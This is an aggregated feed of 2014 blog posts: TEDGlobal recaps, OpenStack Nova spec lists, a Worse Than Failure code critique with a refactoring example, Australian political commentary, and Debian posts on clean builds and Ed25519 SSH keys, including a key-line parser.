    “I’m addicted to adventure,” says Fabien Cousteau, the grandson of Jacques Cousteau and a well-known ocean explorer in his own right. “I think the oceans still hold quite a few secrets,” he says. “If we’re going to explore the final frontier of this planet, we need to live there.” That’s just what Cousteau and his team did for a month this summer with Mission 31. They lived aboard Aquarius, an underwater lab chained to the bottom of the ocean off the coast of Florida, and conducted the equivalent of three years’ worth of scientific research in the span of 31 days. On the TED stage, he shares images and high-speed video of the very different view of animals they got living among them — we see an endangered goliath grouper (that barks!) and a rose sponge (which unfurls quicker than the eye can see). While this mission beat his grandfather’s underwater-living record by one day, Cousteau says that it wasn’t just about setting a record or even just about the science but about creating a visceral connection to the ocean. “My grandfather used to say, people protect what they love,” he says. [Read a Q&A with Cousteau about what he learned living underwater.]

    Ethnobotanist Mark Plotkin is dedicated to protecting the uncontacted tribes of the world. He believes we should all be awed by the unlocked skills and knowledge of shamans and plant masters – but that the last thing we should do is intrude on their lives. Having worked for years in the most remote places in the Colombian rainforest, Plotkin has seen its beauty firsthand – the man-eating crocodile, the world’s biggest anteater, the, er, magical frogs. But life there is under threat — from illegal gold mining, illegal logging, narco-trafficking, hunting and fishing, trade and transport — and the wildlife and local tribes are in danger. Says Plotkin, “Every time a shaman dies it’s like a library burning down.” That’s why he started the Amazon Conservation Team, to introduce technology to already contacted indigenous groups, in culturally sensitive ways that don’t affect their lifestyle, and that help them protect other tribes.

    For the final talk of TEDGlobal 2014, we head south – all the way south. Polar explorer Robert Swan is the first man “stupid enough” — his words — to ever walk to both the North and South poles, and he is deeply worried about the great ice melt in Antarctica. Ice chunks the size of small nations are breaking away from Antarctica — meaning that sea levels will rise at least one meter in the next century. In an impassioned call for preserving the “one beautiful, pristine place left on Earth,” Swan outlines the dangers presented to the Antarctic and his vision for the future: It’s protected now by an international treaty, but that treaty ends in 2041, the blink of an eye in treaty terms. He hopes that by 2041, world leaders will be committed to recycling, sustainability and renewable energy, which will save our last continent.

    Robert Swan speaks at TEDGlobal 2014. Photo: James Duncan Davidson/TED


    TEDIn case you missed it: Day 4 of TEDGlobal 2014

    (L-R) Host Chris Anderson speaks with Chikwe Ihekweazu at TEDGlobal 2014. Photo: James Duncan Davidson/TED

    TEDGlobal 2014 has wrapped up — here, some highlights from the last day of the conference. Onstage and online, it’s been a busy and fantastic Friday.

    Word spreads of Malala Yousafzai’s Nobel Peace Prize. Excitement was high at TEDGlobal this morning when the news came out that the 2014 Nobel Peace Prize had gone jointly to Pakistani education activist Malala Yousafzai (the youngest-ever winner of the prize) and Indian children’s rights activist Kailash Satyarthi. Malala’s father spoke at TED earlier this year, sharing her cause in person; Malala spoke on video, because she’d vowed never to miss a day of school again. But what about the acceptance of her Nobel prize? Nope, she didn’t miss a day of school for that either.

    Some Ebola real talk, courtesy of Chikwe Ihekweazu. In a conversation with Chris Anderson, the public health expert shares two astonishing maps that explain why this is the worst outbreak of Ebola the world has ever dealt with: public health spending isn’t happening where the infectious diseases are. “For Ebola to cause an outbreak, it probably picked the best two or three countries to happen in,” he said. He shares some ways you can help.

    Kimberley Motley drops an incredibly justified F-bomb onstage. As an American litigator in Afghanistan, Kimberley Motley protects people often neglected by Afghan society. In her fight for justice, she sees some things very much worth getting angry about — including the case of Sahar Gul, who at age 12 was sold by “her f*$#ing brother” into forced marriage in a family who brutally tortured her. Using laws that had existed for years but had never once been enforced, Gul was the first domestic violence victim to be represented by a lawyer in Afghanistan. In every word of this jaw-dropping talk, Motley evidenced the passion and brilliance that she brings to her important work. [Read a recap of this talk.]

    Aakash Odedra performs at TEDGlobal 2014. Photo: James Duncan Davidson/TED

    Aakash Odedra gets caught in a storm of knowledge. The mesmerizing dancer fuses modern dance with classical Indian forms in a performance that starts calmly in a haze of blue light. His twirling soon speeds up into a whirlwind of light and paper, creating bird-like formations projected onto the screen behind him. Odedra controls this frenzied scene with a Kinect, breathing an otherworldly energy into the room.

    Three talks from this week’s conference are now live on TED.com. Thanks to amazing work by TED’s film editors and production team, three talks this week came straight from Rio. Pia Mancini’s talk on democracy for the Internet era, Dilip Ratha’s talk on global remittances and Glenn Greenwald’s talk on the importance of privacy were given heroic overnight edits and posted as TED Talks on the homepage. These ideas that made an impact at the conference can now be shared with all! Look for more soon.



    RacialiciousLive From IndieCade: Let’s Do Something About It

    By Arturo R. García

    Top row, L-R: Moderator Shawn Alexander Allen, TJ Thomas, Racialicious owner Latoya Peterson. Bottom row, L-R: Catt Small, Ashley Alicea, Fatima Zenine Villanueva.

    This past weekend saw our owner and publisher Latoya Peterson speak on a panel at IndieCade, a festival and conference celebrating independent game development.

    Moderator Shawn Alexander Allen (Treachery in Beatdown City) said that the discussion, “Let’s Do Something About It,” grew from a talk about race and gaming he gave at last year’s event. Joining them on the panel:

    A Storify of the panel is under the cut.

    [Top image: Screenshot from Six Sides of the World by Cybernetik Design, via Indiecade Facebook page]

    The post Live From IndieCade: Let’s Do Something About It appeared first on Racialicious - the intersection of race and pop culture.

    CryptogramHow James Bamford Came to Write The Puzzle Palace

    Interesting essay about James Bamford and his efforts to publish The Puzzle Palace over the NSA's objections. Required reading for those who think the NSA's excesses are somehow new.

    Planet Linux AustraliaMichael Still: One week of Nova Kilo specifications

    It's been one week of specifications for Nova in Kilo. What are we seeing proposed so far? Here's a summary...

    API



    Administrative

    • Enable the nova metadata cache to be a shared resource to improve the hit rate: review 126705.


    Containers Service



    Hypervisor: FreeBSD

    • Implement support for FreeBSD networking in nova-network: review 127827.


    Hypervisor: Hyper-V

    • Allow volumes to be stored on SMB shares instead of just iSCSI: review 102190.


    Hypervisor: VMWare

    • Add ephemeral disk support to the VMware driver: review 126527 (spec approved).
    • Add support for the HTML5 console: review 127283.
    • Allow Nova to access a VMWare image store over NFS: review 126866.
    • Enable administrators and tenants to take advantage of backend storage policies: review 126547 (spec approved).
    • Support the OVA image format: review 127054.


    Hypervisor: libvirt

    • Add a new linuxbridge VIF type, macvtap: review 117465.
    • Add support for SMBFS as an image storage backend: review 103203.
    • Convert to using built in libvirt disk copy mechanisms for cold migrations on non-shared storage: review 126979.
    • Support libvirt storage pools: review 126978.
    • Support quiescing filesystems during snapshot: review 126966.


    Instance features

    • Allow direct access to LVM volumes if supported by Cinder: review 127318.


    Internal

    • Move flavor data out of the system_metadata table in the SQL database: review 126620.


    Internationalization



    Scheduler

    • Add an IOPS weigher: review 127123 (spec approved).
    • Allow limiting the flavors that can be scheduled on certain host aggregates: review 122530.
    • Create an object model to represent a request to boot an instance: review 127610.
    • Decouple services and compute nodes in the SQL database: review 126895.
    • Implement resource objects in the resource tracker: review 127609.
    • Move select_destinations() to using a request object: review 127612.


    Scheduling

    • Add instance count on the hypervisor as a weight: review 127871.


    Security

    • Provide a reference implementation for console proxies that uses TLS: review 126958.
    • Strongly validate the tenant and user for quota consuming requests with keystone: review 92507.


    Worse Than FailureCodeSOD: We Don't Need no Stinking Elses

    We've all seen it before. I dare say we've all been a party to it.

    First, we look at a block of code that needs to be modified. Then we determine which criterion needs to be added to address the case that we've been tasked to implement. Next, we add the condition and walk away before the waft from the code smell reaches our nostrils. Over time, a monstrosity like the following arises from the depths. Not something that couldn't be greatly improved by some fava beans and a nice refactor. I'm sure the unit tests that cover your production code base will ensure that your refactoring was successful. Right? Right??

    <script type="text/javascript">
       var pageRefresh = true;
       steps_completed[1] = true;
       steps_completed[2] = true;
       if(!$.getCookie('select_level') ) $.setCookie("select_level", 2, 1); 
       if($_SESSION['UserData']['step2'] == true) echo 'steps_completed[3] = true; if(pageRefresh == false) $.setCookie("select_level", 3, 1);'; //it games from register.php
       if($_SESSION['UserData']['step3'] == true) echo 'steps_completed[4] = true; if(pageRefresh == false) $.setCookie("select_level", 4, 1);'; //it games from eshop.php
       if($_POST['register']) echo 'steps_completed[2] = true;$.setCookie("select_level", 2, 1);'; //if i only update my data
       if($_POST['register'] && $this->registerClient->registerClient->getMessage('register_success')) echo '$.setCookie("select_level", 3, 1);'; //if i update data and continue next step 
       if($_GET['auth'] == 'true' && $_SESSION['logged']) echo 'steps_completed[3] = true;$.setCookie("select_level", 3, 1);'; //if i only update my data
       if($_POST['add_financial'] && $_SESSION['logged']) echo 'steps_completed[3] = true;$.setCookie("select_level", 3, 1);'; //if i only update my data 
       if($_POST['add_financial'] && $_SESSION['logged'] && $this->getMessage('financial_success')) echo '$.setCookie("select_level", 4, 1);'; //if i update data and continue next step
       if($_GET['add_financial'] == 'true' && $_SESSION['logged']) echo '$.setCookie("select_level", 4, 1);'; //if i update data and continue next step 
       if($_POST['to_step_2'] && $_SESSION['logged']) echo '$.setCookie("select_level", 2, 1);'; //if i update data and continue next step //if steps1,2,3 is restricted
       if($this->getError('have_order') || $this->getError('have_notcompleted_order')) {
          echo '$.setCookie("select_level", 4, 1);';
          echo 'steps_completed[1] = false;';
          echo 'steps_completed[2] = false;';
          echo 'steps_completed[3] = false;';
          echo 'steps_completed[4] = true;';
       }
    </script>

     

    Photo credit: Foter / CC BY-SA
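
    A sketch of the refactor the post jokes about, with the safety net it asks for; this is an added example, not code from the original post. It transcribes the chain into a last-write-wins function, rewrites it with real `else` branches, and compares the two over every input. The flag names are hypothetical stand-ins for the PHP conditions, `steps_completed[3]` and `[4]` are assumed to start false, and the `pageRefresh == false` writes are treated as dead because `pageRefresh` is set to `true` just above them.

```javascript
// Added example: characterise the legacy chain, then refactor it and compare.
// Flag names are hypothetical stand-ins for the PHP conditions on the page.
const FLAGS = ['step2', 'step3', 'postRegister', 'registerSuccess', 'getAuth', 'logged',
  'postAddFinancial', 'financialSuccess', 'getAddFinancial', 'postToStep2', 'orderError'];

// Literal transcription: every "if" runs in page order and the last write wins.
function legacy(f, cookie) {
  const done = { 1: true, 2: true, 3: false, 4: false }; // assumption: 3 and 4 start false
  let level = cookie;
  if (!level) level = 2;
  if (f.step2) done[3] = true;   // cookie write is dead: pageRefresh is always true
  if (f.step3) done[4] = true;   // same here
  if (f.postRegister) { done[2] = true; level = 2; }
  if (f.postRegister && f.registerSuccess) level = 3;
  if (f.getAuth && f.logged) { done[3] = true; level = 3; }
  if (f.postAddFinancial && f.logged) { done[3] = true; level = 3; }
  if (f.postAddFinancial && f.logged && f.financialSuccess) level = 4;
  if (f.getAddFinancial && f.logged) level = 4;
  if (f.postToStep2 && f.logged) level = 2;
  if (f.orderError) { level = 4; done[1] = done[2] = done[3] = false; done[4] = true; }
  return { level, done };
}

// Refactor: one decision per output, highest-priority case first, with elses.
function refactored(f, cookie) {
  if (f.orderError) return { level: 4, done: { 1: false, 2: false, 3: false, 4: true } };
  const auth = Boolean(f.logged);
  let level;
  if (auth && f.postToStep2) level = 2;
  else if (auth && f.getAddFinancial) level = 4;
  else if (auth && f.postAddFinancial) level = f.financialSuccess ? 4 : 3;
  else if (auth && f.getAuth) level = 3;
  else if (f.postRegister) level = f.registerSuccess ? 3 : 2;
  else level = cookie || 2;
  const done3 = Boolean(f.step2 || (auth && (f.getAuth || f.postAddFinancial)));
  return { level, done: { 1: true, 2: true, 3: done3, 4: Boolean(f.step3) } };
}

// Characterisation test: all 2^11 flag combinations times four cookie states.
function countMismatches() {
  let mismatches = 0;
  for (let bits = 0; bits < (1 << FLAGS.length); bits++) {
    const f = {};
    FLAGS.forEach((name, i) => { f[name] = Boolean(bits & (1 << i)); });
    for (const cookie of [null, 2, 3, 4]) {
      const a = JSON.stringify(legacy(f, cookie));
      const b = JSON.stringify(refactored(f, cookie));
      if (a !== b) mismatches++;
    }
  }
  return mismatches;
}

console.log('mismatching cases:', countMismatches());
```
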

    Kelvin ThomsonYouth Unemployment Levels Risk a Lost Generation

    Youth unemployment must be one of the highest priorities for all levels of Government if we are to secure our economic, skills, social and environmental future as a nation. The sad fact is youth unemployment has been rising over recent years on the watch of the free market neo liberal Federal and State Governments, whose policies of withdrawing investment from our manufacturing industry, cutting investment from our higher education, skills, TAFEs and secondary education sectors, proceeding with harsh welfare reforms, and ramping up migrant worker programs, are hurting Australian young people’s chances to find and keep a job.

    Unemployment figures released on October 8th show Australia’s unemployment rate at 6.1%, with almost 30,000 jobs lost in September. The reason why the unemployment rate is not rising higher is because of a 0.2% fall in the participation rate to 64.5%. Victoria’s unemployment rate is at 6.8%, the highest in 13 years. Unemployment in Victoria is growing 12 times faster than new jobs. It’s increased from 4.9 per cent in December 2010 to 6.8 per cent today. Almost 68,000 more people are out of work. Youth unemployment is at a 15 year high; on average as of July at 13.8% up from 12.3% last year.

    As reported in the Moreland Leader (29/9/14) youth unemployment in the northwest is 17.2%, up from 13.1% last year, driven by the Global Financial Crisis (GFC) and job cuts in the retail and hospitality sectors. Compounding these issues are the cuts by the Liberal Government to our manufacturing industry, including Ford, Holden, and Toyota, such as the $500 million cut from the Automotive Transformation Scheme. The possible offshoring of Australia’s new submarine fleet will further hurt our manufacturing sector, along with the Government’s failure to develop a domestic gas industry. The billions of dollars in cuts by the Liberal Federal and State Governments to our skills, training, TAFE, higher education, secondary and primary education sectors will hamper job opportunities for young people. Punishing young people by making them ineligible for Centrelink New Start Allowance, will only place more obstacles rather than real job opportunities in front of young people.

    The fact that the first job advertised for the East-West Link Tunnel Project is for a 457 Migrant Worker Visa Coordinator is extraordinary. Apparently it does not matter that Victoria has its highest unemployment rate in 13 years, apparently it does not matter that youth unemployment in Melbourne’s North-West is now over 17%, and apparently it does not matter that we already have over a million non-Australians in Australia on temporary visas which give them work rights.

    Victoria’s economy has not been creating enough jobs to cope with the state’s booming population growth. Between December 2010 and August 2014, the number of working aged Victorians (aged 15 and over) swelled by 303,200, equivalent to 6,891 people added every month. Over that four year period to August 2014, manufacturing employment in Victoria dropped by 11,600. Over the same period, employment in construction fell by 13,900, while retail sector employment increased 21,300, healthcare employment by 29,100 and education and training employment by 8,000.

    Victoria’s traditional manufacturing and large industry jobs base is evaporating. Even in these new emerging sectors such as health and education, young Victorians face stiff competition from overseas workers. Despite the rhetoric that high skilled migration is needed for the mining and agriculture sectors, the reality is a high proportion of migrant workers come to Victoria. The Skilled Migration Program grew from 125,755 places in 2011-12 to 128,973 in 2012-13. In 1995-96 the Skilled Migration Program was just 24,100. The occupations with the highest number of primary visa grants were professionals (4,656 or 51.1%) and technicians and trade workers (2,416 or 26.5%) in the 457 Visa Class. Under the Skill Stream, there were professionals 6,083 (65.5%) and technicians and trades with 1,502 (16.2%). According to the Department of Immigration and Border Protection’s State and Territory Migration Summary Report of March 2014, Victoria absorbed the second largest proportion of 457 visa grants in the first three quarters of 2013-14 with 23% or 17,432 people. Under the Skill Stream Victoria took in 19.3% (19,976 people).

    Yet as reported by Nick McKenzie and Richard Baker in The Age on 7th August 2014, as many as 9 in 10 skilled migrant visas may be fraudulent. A 2010 investigation concluded that around 90 per cent or more than 40,000 visa applications in the General Skilled Migration Program lodged per year for the previous three years were suspect. A 2009 investigation concluded that the student visa program was failing, the general skilled migration program was failing, and the falsifying of qualifications was prolific.

    Sir Robert Menzies said on 2nd October 1964 at the opening of Chrysler Manufacturing Centre in Tonsley Park South Australia:

    “…I don’t need to be told that there are quite a number of people here, as I go around, who are what we used to call New Australians, who are people who migrated here since the war. There are millions now- anyhow, something well over one million- in Australia, and every large factory I go to contains a high percentage of people who have come in these years. There could not have been an immigration policy or programme without employment on this scale in industries of this kind. The rural industries, vital as they are to the survival of Australia, can’t employ people by the scores of thousands extra every year. We know they can’t. It is industries of this kind which enable the migration programme to continue, and the fact that the migration programme continues, that you have remarkable increase in the population every year by year has given strength and tone and optimism to the people who run retail stores in Australia, to all sorts of other manufacturers who produce things that are in demand by stores and which are bought by them because they are in demand by their ordinary customers. This is the whole interwoven structure”.

    That was Sir Robert Menzies. Now the Federal and State Liberal Governments are unravelling it. They’re keeping the migrant worker programs- indeed they’re bigger than ever, but they’re killing off manufacturing in general and the car industry in particular. Only a couple of weeks ago the Victorian Liberal Government was boasting that Victoria’s population has continued to grow at record levels, by 1.8% outstripping the 1.7% national average, growing by 108,757 people in the year to March 31, which consisted of 38,467 natural increase and 61,923 from net overseas migration and 8,367 from net interstate migration, to a total of 5.8 million Victorians. Mark my words, this is not going to end well for Australia.

    Planet Linux AustraliaLinux Users of Victoria (LUV) Announce: LUV Beginners October Meeting: Command Line

    Oct 18 2014 12:30
    Oct 18 2014 16:30
    Location: RMIT Building 91, 110 Victoria Street, Carlton South

    Wen Lin will be introducing newcomers to Linux to the use of the "command line".

    Wen Lin is the long-serving treasurer for Linux Users of Victoria and has provided several presentations in the past on Libre/OpenOffice.

    LUV would like to acknowledge Red Hat for their help in obtaining the Buzzard Lecture Theatre venue and VPAC for hosting, and BENK Open Systems for their financial support of the Beginners Workshops.

    Linux Users of Victoria Inc., is an incorporated association, registration number A0040056C.


    Planet Linux AustraliaMichael Still: Compute Kilo specs are open

    From my email last week on the topic:
    I am pleased to announce that the specs process for nova in kilo is
    now open. There are some tweaks to the previous process, so please
    read this entire email before uploading your spec!
    
    Blueprints approved in Juno
    ===========================
    
    For specs approved in Juno, there is a fast track approval process for
    Kilo. The steps to get your spec re-approved are:
    
     - Copy your spec from the specs/juno/approved directory to the
    specs/kilo/approved directory. Note that if we declared your spec to
    be a "partial" implementation in Juno, it might be in the implemented
    directory. This was rare however.
     - Update the spec to match the new template
     - Commit, with the "Previously-approved: juno" commit message tag
     - Upload using git review as normal
    
    Reviewers will still do a full review of the spec, we are not offering
    a rubber stamp of previously approved specs. However, we are requiring
    only one +2 to merge these previously approved specs, so the process
    should be a lot faster.
    
    A note for core reviewers here -- please include a short note on why
    you're doing a single +2 approval on the spec so future generations
    remember why.
    
    Trivial blueprints
    ==================
    
    We are not requiring specs for trivial blueprints in Kilo. Instead,
    create a blueprint in Launchpad
    at https://blueprints.launchpad.net/nova/+addspec and target the
    specification to Kilo. New, targeted, unapproved specs will be
    reviewed in weekly nova meetings. If it is agreed they are indeed
    trivial in the meeting, they will be approved.
    
    Other proposals
    ===============
    
    For other proposals, the process is the same as Juno... Propose a spec
    review against the specs/kilo/approved directory and we'll review it
    from there.
    


    After a week I'm seeing something interesting. In Juno the specs process was new, and we saw a pause in the development cycle while people actually wrote down their designs before sending the code. This time around people know what to expect, and there are left over specs from Juno lying around. We're therefore seeing specs approved much faster than in Kilo. This should reduce the effect of the "pipeline flush" that we saw in Juno.

    So far we have five approved specs after only a week.


    Planet DebianDirk Eddelbuettel: Seinfeld streak at GitHub

    Early last year, I referred to a Seinfeld Streak in a blog post referring to almost two months of updates to the Rcpp Gallery. This is sometimes called Jerry Seinfeld's secret to productivity: Just keep at it. Don't break the streak.

    I now have a different streak:

    github activity october 2013 to october 2014

    Now we'll see how far this one will go.

    This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.


    Sam VargheseAmerica forms coalitions to make money

    WHEN the United States talks about coalitions, one should realise that it is all about finance. Not about bringing together countries to fight a war together.

    Back in 1990, when Iraq invaded Kuwait, George Bush Senior put his foot in it by threatening never to take it lying down. He was forced to go to war, reluctantly. But his secretary of state James Baker made things worthwhile by bringing together a bunch of nations who were prepared to pick up the bills.

    The Americans did the lion’s share of the fighting. And the others in the “coalition” paid the bills.

    For example, Japan and Germany could definitely not take part in any fighting, given that the constitutions of both countries at the time did not allow them to participate in conflicts. But each gave $US9 billion to the effort. The US ended up with a profit of $US6 billion after collecting $US60 billion and spending $US54 billion.

    That alone made the effort to bring the “coalition” together worthwhile.

    The US also benefits through the sale of weapons. Practically all the countries which are part of the current “coalition” which has banded together to fight the Islamic State extremists use American weapons.

    Presto, all the missiles which get used will have to be replaced. Factor in anything from $US50 million to $US650 million, depending on how sophisticated the missile is. The stocks of companies that are part of the US military industrial complex have soared ever since the conflict erupted and American patriots like Dick Cheney have been watching their bank accounts swell.

    TEDSideways solutions and inverted explanations: A recap of session 10 of TEDGlobal 2014

    Juana Molina performs at TEDGlobal 2014. Photo: James Duncan Davidson/TED

    The thinkers in this session, “Lateral Action,” don’t go about creating change in the usual ways. Here, their unexpected approaches:

    Argentinian singer-songwriter Juana Molina opens the session with a hypnotizing performance on the electric guitar and a rack of pedals that layer sounds into gorgeously complex song structures. Singing calmly behind layers of chords, she mixes Spanish lyrics with simple tones that loop in on one another and build and build. At the back of the auditorium stand a few rock-concert-style head-nodding fans, some wearing event staff T-shirts, drinking in the glorious noise as she plays “Ferocisimo” and “Bicho Auto” from her latest record, Wed 21. Watch a full performance from this May.

    When she was 16, Khalida Brohi found out that a close friend was a victim of an “honor killing.” Growing up between a big city and a small village in Pakistan, she honored the family traditions from her village, and she’d seen friends enter arranged marriages — but the “honor killing” shook her to her core. “A custom that kills just didn’t make any sense to me,” she said. And so she launched a campaign to stop it — one that quickly gained momentum online. But at home, her family’s car was stoned; her life was threatened. She had to let the campaign end. “As an 18-year-old, I thought this was the biggest failure of my life,” says Brohi. But it taught her two important lessons: (1) That she had to align calls for change with the core values of the community and (2) that she needed to include the women themselves in her campaign. So Brohi did something bold: she apologized to the community, and set about promoting tribal traditions like music and storytelling. She also asked her tribal leaders for support in building a center where women could do traditional embroidery. With this, the Sughar Empowerment Society was born. Women do embroidery here, yes, but they also get a six-month education about their rights and about the art of entrepreneurship. So far, Sughar has reached 900 women and 24 villages. But Brohi hopes to build this movement to the point where, in the next 10 years, she reaches more like a million. [Read a Q&A with Khalida that tells much more of her story.]

    To write a book on Rio’s underground drug trade, journalist Misha Glenny is learning to speak Brazilian Portuguese, or Carioca. His biggest takeaway: His mind is just not what it used to be. Glenny, now in his mid-50s, finds that his short-term memory is wearing down and his ability to imitate new sounds is also shot. Of his initial attempts to produce a nasal affect, Glenny jokes: “My teachers said I sounded like a cat being tortured … in Polish.” And as a 50-something he doesn’t quite have the opportunities he used to have when practicing a new language: getting drunk and chatting up girls at parties. Nonetheless Glenny is devoted to his education, hoping that his linguistic journey will help him better understand the Brazilian culture he’s come to adore.

    What makes you go to a museum to see a picture hanging on a wall, instead of just downloading that picture on your mobile phone? Vik Muniz believes it’s for the quiet, magical moment that hovers between what we can know and what we can only assume about the art. His art captures this moment beautifully through a variety of media, including sugar, chocolate and living cells. All of his art asks people to question their assumptions about what they think they know about the world.

    Urban architect Alejandro Aravena has taken on difficult design challenges in Chile, but he believes that the more complex the problem, the greater the need for simplicity. He shares three success stories: First, when asked to create low-income housing with a budget for only half the size of comfortable middle-class homes, his team invented half-houses with the framework to build further later, inspired by the owner-built energy of favelas. Next, when challenged to use less energy in a traditional office building, he devised an inside-out structure, with an opaque cooling exterior and a light-giving atrium center that reduced energy costs by two-thirds. Last, when asked to rebuild after the 2010 Chile earthquake, he created a barrier to keep out future tsunami waves that also solved the concurrent problem of poor public space: a small forest. In all three projects, he solved his problems through community participation, and a little common sense. He says, “We won’t ever solve the problem unless we use people’s own capacity to build.”

    “If you’re giving back, you took too much,” says organizational changemaker Ricardo Semler, 20 years after transforming a struggling Brazilian equipment supplier into a radically democratic, resilient and successful company. He prefers to give as he goes, so he continues to create new companies, books and education options like the Lumiar School as he grows older. It sounds crazy, and deeply wise, but it works. One tool he recommends: Ask yourself “3 whys” in a row: By the third why, you will come to new answers.

    Ricardo Semler speaks at TEDGlobal 2014. Photo: James Duncan Davidson/TED


    Planet DebianJonathan Wiltshire: Clean builds for the win

    I’ve just spent a little time squashing several bugs on the trot, all the same: insufficient build-dependencies when built in a clean environment. Typically this means that the package was uploaded after being built on a developer’s normal machine, which already has everything required installed.

    It’s long been the case that we have several ways to build packages in a clean chroot before upload, which reveals these sorts of errors and more. There’s not really any excuse for uploading packages that fail to build in this way.

    Please, for the sanity of everyone working with the archive, don’t upload packages that haven’t been built in a clean environment. It’s such a waste of everybody’s time if you don’t do this most basic of checks.


    Clean builds for the win is a post from: jwiltshire.org.uk

    Planet DebianSteinar H. Gunderson: Short SSH keys

    I'm sure this is useful for something beyond being neat:

    klump:~> cat .ssh/id_ed25519.pub
    ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFePWUlZmVbCZ9KHa4pOOMBXHaMFeuuIZDw0uHHEY2/m sesse@klump
    

    I hope OpenSSH doesn't eventually grow a sort-of single point of failure in “djb ALL the algorithms!” by default, though.
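
    Why the line above is so short, as an added example (not part of the original post): the base64 field is an SSH wire-format blob of two length-prefixed strings, the algorithm name and a 32-byte Ed25519 public key, 51 bytes in all. The parser below also applies the checks one would want before accepting such a line into `authorized_keys`; the function names are illustrative and the key is the one quoted in the post.

```javascript
// Added example: parse and validate an ssh-ed25519 public-key line (Node.js).

// Read one SSH wire-format "string": uint32 big-endian length, then that many bytes.
function readString(buf, offset) {
  if (offset + 4 > buf.length) throw new Error('truncated length field');
  const len = buf.readUInt32BE(offset);
  const end = offset + 4 + len;
  if (end > buf.length) throw new Error('string runs past end of blob');
  return { value: buf.subarray(offset + 4, end), next: end };
}

function parseEd25519PublicKeyLine(line) {
  const [type, b64, ...rest] = line.trim().split(/\s+/);
  if (type !== 'ssh-ed25519') throw new Error('not an ssh-ed25519 line');
  if (!b64) throw new Error('missing key blob');

  const blob = Buffer.from(b64, 'base64');
  // Buffer.from() tolerates junk characters, so insist on a clean round trip.
  if (blob.toString('base64') !== b64) throw new Error('blob is not canonical base64');

  // The algorithm name is repeated inside the blob; the two must agree.
  const alg = readString(blob, 0);
  if (alg.value.toString('ascii') !== type) {
    throw new Error('inner algorithm name does not match line prefix');
  }
  const key = readString(blob, alg.next);
  if (key.value.length !== 32) throw new Error('Ed25519 public key must be 32 bytes');
  if (key.next !== blob.length) throw new Error('trailing bytes after key');

  return {
    type,
    key: key.value,            // raw 32-byte public key
    blobBytes: blob.length,    // 4 + 11 + 4 + 32
    base64Chars: b64.length,
    comment: rest.join(' '),
  };
}

// Returns null when the line is acceptable, otherwise the reason it was rejected.
function rejectReason(line) {
  try {
    parseEd25519PublicKeyLine(line);
    return null;
  } catch (e) {
    return e.message;
  }
}

// The public key line quoted in the post.
const PAGE_KEY_LINE =
  'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFePWUlZmVbCZ9KHa4pOOMBXHaMFeuuIZDw0uHHEY2/m sesse@klump';

const parsed = parseEd25519PublicKeyLine(PAGE_KEY_LINE);
console.log(parsed.type, parsed.blobBytes, 'bytes,', parsed.base64Chars, 'base64 chars');
```
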